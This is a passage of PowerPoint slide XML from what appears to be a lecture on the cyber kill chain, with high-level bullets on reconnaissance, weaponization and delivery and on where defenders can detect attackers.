              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>activities?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Is it possible </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cisco to detect you as an adversary at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-170" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stage?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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242061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2738120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Weaponization</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1157478"/>
            <a:ext cx="8816340" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Building the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>warhead!</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Detonating target</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>system:</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="270"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Build </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Package the code to avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detection</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Wrap </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>code in proper</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Most offensive part of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="695325" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="645"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Involve a lawyer at this stage to avoid any</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>legal  implications later</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Adversaries often </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>their own specific</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>technique  for embedding warhead which is a way to detect  and trace</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>them!</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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242061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3458845">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Delivery</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1114297"/>
            <a:ext cx="8544560" cy="5617210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3540"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Building </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>flight system </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>engine!</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3540"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sending payload to the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="3115"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>based</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="2620"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1156335" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http, smtp, ftp, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>https,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dns,..</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Media-based</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="2565"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1156335" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>USB, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>media </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>card,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CD/DVD,...</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3165"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Best point to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detect attackers before getting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="3180"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>their target machines</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="203835" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2880"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Smart </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>deception techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>utilized </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>this  stage!</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="341630" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Consider legal and technical consequences of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
